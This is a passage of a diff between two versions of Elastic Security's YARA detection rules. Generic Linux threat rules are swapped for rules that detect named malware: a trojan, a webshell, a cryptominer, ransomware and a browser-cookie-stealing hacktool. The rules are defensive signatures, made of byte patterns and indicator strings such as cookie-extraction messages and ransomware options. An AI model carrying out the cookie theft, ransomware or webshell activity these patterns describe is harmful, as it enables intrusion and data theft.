72 2F 62 69 6E 2F 77 64 31 } - $a2 = { 2F 75 73 72 2F 62 69 6E 2F 63 64 31 } - $a3 = { 2F 75 73 72 2F 62 69 6E 2F 63 64 74 } + $a = { 89 C0 89 45 F4 83 7D F4 00 79 1C 83 EC 0C 68 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_B0B891Fb : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xhide_7F0A131B : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Trojan Xhide (Linux.Trojan.Xhide)" author = "Elastic Security" - id = "b0b891fb-f262-4a06-aa3c-be0baeb53172" - date = "2024-02-21" - modified = "2024-06-12" + id = "7f0a131b-c305-4a08-91cc-ac2de4d95b19" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L740-L759" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d666bc0600075f01d8139f8b09c5f4e4da17fa06a86ebb3fa0dc478562e541ae" - logic_hash = "9ec82691a230f3240b1253f99a45cd0baa3238b6fd533004a22a6152b6ac9a12" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xhide.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0dc35f1a1fe1c59e454cd5645f3a6220b7d85661437253a3e627eed04eca2560" + logic_hash = "4843042576d1f4f37b5a7cda1b261831030d9145c49b57e9b4c66e2658cc8cf9" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "c6e4f7bcc94b584f8537724d3ecd9f83e6c3981cdc35d5cdc691730ed0e435ef" - severity = 50 + fingerprint = "767f2ea258cccc9f9b6673219d83e74da1d59f6847161791c9be04845f17d8cb" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 6D 61 69 6E 2E 65 6E 63 72 79 70 74 5F 66 69 6C 65 } - $a2 = { 2F 64 65 76 2F 75 72 61 6E 64 6F 6D 2F 6D 6E 74 2F 65 78 74 2F 6F 70 74 31 35 32 35 38 37 38 39 30 36 32 35 37 36 32 39 33 39 34 35 33 31 32 35 42 69 64 69 5F 43 6F 6E 74 72 6F 6C 4A 6F 69 6E 5F 43 6F 6E 74 72 6F 6C 4D 65 65 74 65 69 5F 4D 61 79 65 6B 50 61 68 61 77 68 5F 48 6D 6F 6E 67 53 6F 72 61 5F 53 6F 6D 70 65 6E 67 53 79 6C 6F 74 69 5F 4E 61 67 72 69 61 62 69 20 6D 69 73 6D 61 74 63 68 62 61 64 20 66 6C 75 73 68 47 65 6E 62 61 64 20 67 20 73 74 61 74 75 73 62 61 64 20 72 65 63 6F 76 65 72 79 63 61 6E 27 74 20 68 61 70 70 65 6E 63 61 73 36 34 20 66 61 69 6C 65 64 63 68 61 6E 20 72 65 63 65 69 76 65 64 75 6D 70 69 6E 67 20 68 65 61 70 65 6E 64 20 74 72 61 63 65 67 63 } + $a = { 8B 85 68 FF FF FF 83 E0 40 85 C0 75 1A 8B 85 68 FF FF FF 83 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_Cd9Ce063 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xhide_Cd8489F7 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Trojan Xhide (Linux.Trojan.Xhide)" author = "Elastic Security" - id = "cd9ce063-a33b-4771-b7c0-7342d486e15a" - date = "2024-02-21" - modified = "2024-06-12" + id = "cd8489f7-795f-4fd5-b9a6-03ddd0f3bad4" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L761-L779" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "485581520dd73429b662b73083d504aa8118e01c5d37c1c08b21a5db0341a19d" - logic_hash = "ba070c2147028cad4be1c139b16a770c9d9854456d073373a93ed0b213f7b34c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xhide.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0dc35f1a1fe1c59e454cd5645f3a6220b7d85661437253a3e627eed04eca2560" + logic_hash = "34924260c811f1796ae37faec922bc21bb312ebb0672042d3ec27855f63ed61e" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "e090bd44440e912d04de390c240ca18265bcf49e34f6689b3162e74d2fd31ba4" - severity = 50 + fingerprint = "30b2e0a8ad2fdaa040d748d8660477ae93a6ebc89a186029ff20392f6c968578" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 2C 2A 73 74 72 75 63 74 20 7B 20 46 20 75 69 6E 74 70 74 72 3B 20 2E 61 75 74 6F 74 6D 70 5F 32 36 20 2A 74 6C 73 2E 43 6F 6E 6E 20 7D } + $a = { 6F 74 2E 63 6F 6E 66 0A 0A 00 46 75 6C 6C 20 70 61 74 68 20 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_B8B076F4 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xhide_840B27C7 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Trojan Xhide (Linux.Trojan.Xhide)" author = "Elastic Security" - id = "b8b076f4-c64a-400b-80cb-5793c97ad033" - date = "2024-02-21" - modified = "2024-06-12" + id = "840b27c7-191f-4d31-9b46-f22be634b2af" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L781-L799" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4496e77ff00ad49a32e090750cb10c55e773752f4a50be05e3c7faacc97d2677" - logic_hash = "37f3be4cbda4a93136d66e32d7245d4c962a9fe1c98fb0325f42a1d16d6d9415" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xhide.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0dc35f1a1fe1c59e454cd5645f3a6220b7d85661437253a3e627eed04eca2560" + logic_hash = "6b0bfe69558399af6e0469a31741dcf2eb91fbe3e130267139240d3458eb8a0d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f9c6c055e098164d0add87029d03aec049c4bed2c4643f9b4e32dd82f596455c" - severity = 50 + fingerprint = "f1281db9a49986e23ef1fd9a97785d3bd7c9b3b855cf7e51744487242dd395a3" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 48 81 EC C0 00 00 00 48 89 AC 24 B8 00 00 00 48 8D AC 24 B8 00 00 00 44 0F 11 7C 24 2E 44 0F 11 7C 24 2F 44 0F 11 7C 24 3F 44 0F 11 7C 24 4F 44 0F 11 7C 24 5F 48 8B 94 24 C8 00 00 00 48 89 54 } + $a = { 8B 45 98 83 E0 40 85 C0 75 16 8B 45 98 83 E0 08 85 C0 75 0C 8B } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_1Ac392Ca : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2009_1897_6Cf0A073 : FILE MEMORY CVE_2009_1897 { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Exploit Cve 2009 1897 (Linux.Exploit.CVE-2009-1897)" author = "Elastic Security" - id = "1ac392ca-d428-47ef-98af-d02d8305ae67" - date = "2024-02-21" - modified = "2024-06-12" + id = "6cf0a073-571e-48ef-be58-807bff1a5e97" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L801-L819" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "dca2d035b1f7191f7876eb727b13c308f63fe8f899cab643526f9492ec0fa16f" - logic_hash = "6ffa5099c0d18644cd11a0511db542d2f809e4cba974eccca814fedf5a2b0a5b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2009_1897.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "85f371bf73ee6d8fcb6fa9a8a68b38c5e023151257fd549855c4c290cc340724" + logic_hash = "dcde454fda09cb6bc7b213b76d70eafd65d2601cfda70ff25c6940b55ce3adb6" score = 75 - quality = 73 - tags = "FILE, MEMORY" - fingerprint = "e21805cc2d548c940b0cefa8ee99bd55c5599840e32b8341a4ef5dfb0bc679ff" - severity = 50 + quality = 75 + tags = "FILE, MEMORY, CVE-2009-1897" + fingerprint = "8fcb3687d4ec5dd467d937787f0659448a91446f92a476ff7ba471a02d6b07a9" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 53 4F 41 50 41 63 74 69 6F 6E 3A 20 75 72 6E 3A 73 63 68 65 6D 61 73 2D 75 70 6E 70 2D 6F 72 67 3A 73 65 72 76 69 63 65 3A 57 41 4E 49 50 43 6F 6E 6E 65 63 74 69 6F 6E 3A 31 23 41 64 64 50 6F 72 74 4D 61 70 70 69 6E 67 } + $a = { 31 C0 85 DB 78 28 45 31 C9 41 89 D8 B9 02 00 00 00 BA 01 00 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_949Bf68C : FILE MEMORY +rule ELASTIC_Linux_Webshell_Generic_E80Ff633 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Webshell Generic (Linux.Webshell.Generic)" author = "Elastic Security" - id = "949bf68c-e6a0-451d-9e49-4515954aabc8" - date = "2024-02-21" - modified = "2024-06-12" + id = "e80ff633-990e-4e2e-ac80-2e61685ab8b0" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L821-L839" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "cc1b339ff6b33912a8713c192e8743d1207917825b62b6f585ab7c8d6ab4c044" - logic_hash = "aaae0a8a2827786513891bc8c3e3418823ae3f3291d891e80e82113b929f7513" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Webshell_Generic.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7640ba6f2417931ef901044152d5bfe1b266219d13b5983d92ddbdf644de5818" + logic_hash = "d345e6ce3e51ed55064aafb1709e9bee7ef2ce87ec80165ac1b58eebd83cefee" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e478c8befed6da3cdd9985515e4650a8b7dad1ea28292c2cf91069856155facd" - severity = 50 + fingerprint = "dcca52dce2d50b0aa6cf0132348ce9dc234b985ae683b896d9971d409f109849" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 55 89 E5 57 56 53 81 EC 58 01 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 89 85 B4 FE FF FF 89 95 AC FE FF FF 8D B5 C4 FE FF FF 56 ?? ?? ?? ?? ?? 58 5A 6A 01 56 } + $a = { 24 A8 00 00 00 89 1C 24 83 3C 24 00 74 23 83 04 24 24 8D B4 24 AC 00 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_Bd35454B : FILE MEMORY +rule ELASTIC_Linux_Webshell_Generic_41A5Fa40 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Webshell Generic (Linux.Webshell.Generic)" author = "Elastic Security" - id = "bd35454b-a0dd-4925-afae-6416f3695826" - date = "2024-02-21" - modified = "2024-06-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L841-L860" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "cd729507d2e17aea23a56a56e0c593214dbda4197e8a353abe4ed0c5fbc4799c" - logic_hash = "d3619cdb002b4ac7167716234058f949623c42a64614f5eb7956866b68fff5e4" + id = "41a5fa40-a4e7-4c97-a3b9-3700743265df" + date = "2021-06-28" + modified = "2021-09-16" + reference = "18ac7fbc3d8d3bb8581139a20a7fee8ea5b7fcfea4a9373e3d22c71bae3c9de0" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Webshell_Generic.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "574148bc58626aac00add1989c65ad56315c7e2a8d27c7b96be404d831a7a576" score = 75 - quality = 71 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "721aa441a2567eab29c9bc76f12d0fdde8b8a124ca5a3693fbf9821f5b347825" - severity = 50 + fingerprint = "49e0d55579453ec37c6757ddb16143d8e86ad7c7c4634487a1bd2215cd22df83" + severity = "100" arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 6D 61 69 6E 2E 65 6E 63 72 79 70 74 5F 66 69 6C 65 } - $a2 = { 57 68 61 74 20 67 75 61 72 61 6E 74 65 65 73 3F } + $a = { 5A 46 55 6C 73 6E 55 6B 56 52 56 55 56 54 56 46 39 56 55 6B 6B } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_1E047045 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Ursu_3C05F8Ab : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Cryptominer Ursu (Linux.Cryptominer.Ursu)" author = "Elastic Security" - id = "1e047045-e08b-4ecb-8892-90a1ab94f8b1" - date = "2024-02-21" - modified = "2024-06-12" + id = "3c05f8ab-d1b8-424b-99b7-1fe292ae68ff" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L862-L880" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2c49772d89bcc4ad4ed0cc130f91ed0ce1e625262762a4e9279058f36f4f5841" - logic_hash = "0d28df53e030664e7225f1170888b51e94e64833537c5add3e10cfdb4f029a3a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Ursu.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d72361010184f5a48386860918052dbb8726d40e860ea0287994936702577956" + logic_hash = "8261e4ee40131cd7df61914cd7bdf154e8a2b5fa3abd9d301436f9371253f510" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "aa99b16f175649c251cb299537baf8bded37d85af8b2539b4aba4ffd634b3f66" - severity = 50 + fingerprint = "463d4f675589e00284103ef53d0749539152bbc3772423f89a788042805b3a21" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 18 48 89 FB 48 89 F5 64 48 8B 04 25 28 00 00 00 48 89 44 24 08 31 C0 48 8B 47 08 48 89 C2 48 C1 EA 18 88 14 24 48 89 C2 48 C1 EA 10 88 54 24 01 48 89 C2 48 C1 EA 08 88 54 24 02 88 44 } + $a = { 64 55 4C 2C 20 0A 09 30 78 33 30 32 38 36 30 37 38 32 38 37 38 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_1973391F : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Sharpchromium_41Ce5080 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Windows Hacktool Sharpchromium (Windows.Hacktool.SharpChromium)" author = "Elastic Security" - id = "1973391f-b9a2-465d-8990-51c6e9fab84b" - date = "2024-02-21" - modified = "2024-06-12" + id = "41ce5080-7d84-4a56-8de8-86959eb92057" + date = "2022-11-20" + modified = "2023-01-11" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L882-L901" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7bd76010f18061aeaf612ad96d7c03341519d85f6a1683fc4b2c74ea0508fe1f" - logic_hash = "632a43b68e498f463ff5dfa78212646b8bd108ea47ff11164c8c1a69e830c1ac" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_SharpChromium.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9dd65aa53728d51f0f3b9aaf51a24f8a2c3f84b4a4024245575975cf9ad7f2e5" + logic_hash = "50972a6e6af1d7076243320fb6559193e0c46ac1300aa62d12390fdeb2fffdcd" score = 75 - quality = 71 + quality = 48 tags = "FILE, MEMORY" - fingerprint = "90a261afd81993057b084c607e27843ff69649b3d90f4d0b52464e87fdf2654d" - severity = 50 + fingerprint = "b6695ded1a6f647812c7f355e089a2ed7209ac59f51a97d8f6b1897bb1e7d9ad" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = { 70 69 63 6B 75 70 20 2D 6C 20 2D 74 20 66 69 66 6F 20 2D 75 } - $a2 = { 5B 2D 5D 20 43 6F 6E 6E 65 63 74 20 66 61 69 6C 65 64 2E } + $guid = "F1653F20-D47D-4F29-8C55-3C835542AF5F" ascii wide nocase + $print_str0 = "[X] Exception occurred while writing cookies to file: {0}" ascii wide fullword + $print_str1 = "[*] All cookies written to {0}" ascii wide fullword + $print_str2 = "\\{0}-cookies.json" ascii wide fullword + $print_str3 = "[*] {0} {1} extraction." ascii wide fullword condition: - all of them + $guid or all of ($print_str*) } -rule ELASTIC_Linux_Generic_Threat_66D00A84 : FILE MEMORY +rule ELASTIC_Linux_Ransomware_Monti_9C64F016 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Ransomware Monti (Linux.Ransomware.Monti)" author = "Elastic Security" - id = "66d00a84-c148-4a82-8da5-955787c103a4" - date = "2024-02-21" - modified = "2024-06-12" + id = "9c64f016-0fd9-41bf-8916-cdf3a35efdd6" + date = "2023-07-27" + modified = "2024-02-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L903-L921" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "464e144bcbb54fc34262b4d81143f4e69e350fb526c803ebea1fdcfc8e57bf33" - logic_hash = "a1d60619d72b3309bfaaf8b4085dd5ed90142ff3e9ebfe80fcd7beba5f14a62e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Ransomware_Monti.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ad8d1b28405d9aebae6f42db1a09daec471bf342e9e0a10ab4e0a258a7fa8713" + logic_hash = "c22a4efaaf97d68deaf1978e637dd7f790541e5007c6323629bcc9e3d4eecd06" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1b6c635dc149780691f292014f3dbc20755d26935b7ae0b3d8f250c10668e28a" - severity = 50 + fingerprint = "af28cc97eed328f3b2b0181784545e41a521e9dfff09a504177cb56929606b84" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 48 81 EC 10 04 00 00 4C 89 E7 49 8D 8C 24 FF 03 00 00 49 89 E0 48 89 E0 8A 17 84 D2 74 14 80 7F 01 00 88 10 74 05 48 FF C0 EB 07 88 58 01 48 83 C0 02 48 FF C7 48 39 F9 75 DE 4C 39 C0 74 06 C6 } + $a1 = "[%s] Flag doesn't equal MONTI." + $a2 = "--vmkill Whether to kill the virtual machine" + $a3 = "MONTI strain." + $a4 = "http://monti" condition: - all of them + 2 of them } -rule ELASTIC_Linux_Generic_Threat_D2Dca9E7 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Squirrelwaffle_88033Ff1 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Windows Trojan Squirrelwaffle (Windows.Trojan.Squirrelwaffle)" author = "Elastic Security" - id = "d2dca9e7-6ce6-49b9-92a8-f0149f2deb42" - date = "2024-05-20" - modified = "2024-06-12" + id = "88033ff1-f9b1-4cdc-bb68-bd3a10027584" + date = "2021-09-20" + modified = "2022-01-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L923-L941" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9b10bb3773011c4da44bf3a0f05b83079e4ad30f0b1eb2636a6025b927e03c7f" - logic_hash = "175b9a80314cf280b995a012f13e65bd4ce7e27faebf02ae5abe978dbd14447c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Squirrelwaffle.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "00d045c89934c776a70318a36655dcdd77e1fedae0d33c98e301723f323f234c" + logic_hash = "695d7d411a4de23ba1517a06bda3ce73add37dca1e6fe9046e7c2dcae237389e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2a1182f380b07d7ad1f46514200e33ea364711073023ad05f4d82b210e43cfed" - severity = 50 - arch_context = "x86, arm64" + fingerprint = "94c0d8ce3e06cf02a6fb57c074ff0ef60346babcde43c61371d099b011d9fcf9" + severity = 100 + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = { D0 4D E2 00 50 A0 E1 06 60 8F E0 08 00 00 0A 10 20 90 E5 18 30 90 E5 03 00 52 E1 01 40 D2 34 10 20 80 35 1F 00 00 3A 3B 01 00 EB 00 40 A0 E1 1C 00 00 EA 80 30 9F E5 38 40 80 E2 04 20 A0 E1 03 } + $a1 = "start /i /min /b start /i /min /b start /i /min /b " ascii fullword + $a2 = " HTTP/1.1" ascii fullword + $a3 = "Host:" ascii fullword + $a4 = "APPDATA" ascii fullword condition: all of them } -rule ELASTIC_Linux_Generic_Threat_1F5D056B : FILE MEMORY +rule ELASTIC_Windows_Trojan_Squirrelwaffle_D3B685A1 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Windows Trojan Squirrelwaffle (Windows.Trojan.Squirrelwaffle)" author = "Elastic Security" - id = "1f5d056b-1e9c-47f6-a63c-752f4cf130a1" - date = "2024-05-20" - modified = "2024-06-12" + id = "d3b685a1-2d1c-44a3-8d83-ff661d491a52" + date = "2021-09-21" + modified = "2022-01-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L943-L962" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "99d982701b156fe3523b359498c2d03899ea9805d6349416c9702b1067293471" - logic_hash = "8ad23b593880dc1bebc95c92d0efc3a90e6b1e143c350e30b1a4258502ce7fc7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Squirrelwaffle.yar#L24-L42" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "00d045c89934c776a70318a36655dcdd77e1fedae0d33c98e301723f323f234c" + logic_hash = "7d187aa75fc767f5009f3090852de4894776f4b3f99f189478e7e9fd9c3acbe7" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "b44a383deaa361db02b342ea52b4f3db9a604bf8b66203fefa5c5d68c361a1d0" - severity = 50 - arch_context = "x86, arm64" + fingerprint = "15df7efab9cc40ff57070d18ae67b549c55595d7cbf3ca02963336e4297156c4" + severity = 100 + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = { 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 30 31 32 33 34 35 36 37 38 } - $a2 = { 47 45 54 20 2F 63 6F 6E 66 69 67 20 48 54 54 50 2F 31 2E 30 } + $a1 = { 08 85 C0 75 0F 8D 45 94 50 8D 45 D0 6A 20 50 FF D7 83 C4 0C } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_D94E1020 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Avoslocker_7Ae4D4F2 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Windows Ransomware Avoslocker (Windows.Ransomware.Avoslocker)" author = "Elastic Security" - id = "d94e1020-ff66-4501-95e1-45ab552b1c18" - date = "2024-05-20" - modified = "2024-06-12" + id = "7ae4d4f2-be5f-4aad-baaa-4182ff9cf996" + date = "2021-07-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L964-L982" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "96a2bfbb55250b784e94b1006391cc51e4adecbdde1fe450eab53353186f6ff0" - logic_hash = "e4b4e588588080c66076aec02f56b4764a5f72059922db9651461c0287fe0351" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Avoslocker.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "43b7a60c0ef8b4af001f45a0c57410b7374b1d75a6811e0dfc86e4d60f503856" + logic_hash = "c87faf6f128fd6a8cabd68ec8de72fb10e6be42bdbe23ece374dd8f3cf0c1b15" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c291c07b6225c8ce94f38ad7cb8bb908039abfc43333c6524df776b28c79452a" - severity = 50 - arch_context = "x86, arm64" + fingerprint = "0e5ff268ed2b62f9d31df41192135145094849a4e6891407568c3ea27ebf66bb" + severity = 100 + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = { D0 4D E2 0C C0 9D E5 0C 30 4C E2 02 00 53 E3 14 30 8D E2 00 30 8D E5 10 30 9D E5 0C 10 A0 E1 03 20 A0 E1 01 00 00 8A 0F 00 00 EB 0A 00 00 EA 03 20 A0 E1 0C 10 A0 E1 37 00 90 EF 01 0A 70 E3 00 } + $a1 = "drive %s took %f seconds" ascii fullword + $a2 